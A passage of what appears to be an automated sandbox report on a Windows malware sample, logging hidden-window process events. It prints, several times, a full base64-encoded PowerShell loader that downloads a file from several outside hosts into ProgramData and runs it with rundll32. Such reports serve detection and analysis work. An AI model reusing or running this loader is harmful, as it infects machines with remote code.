ADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 16, 2023, 10:33 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan filepath: wscript	1	1
CreateProcessInternalW May 16, 2023, 10:33 a.m.	thread_identifier: 2300 thread_handle: 0x00000300 process_identifier: 2296 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000308	1	1
ShellExecuteExW May 16, 2023, 10:33 a.m.	show_type: 0 filepath_r: powershell parameters: -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQB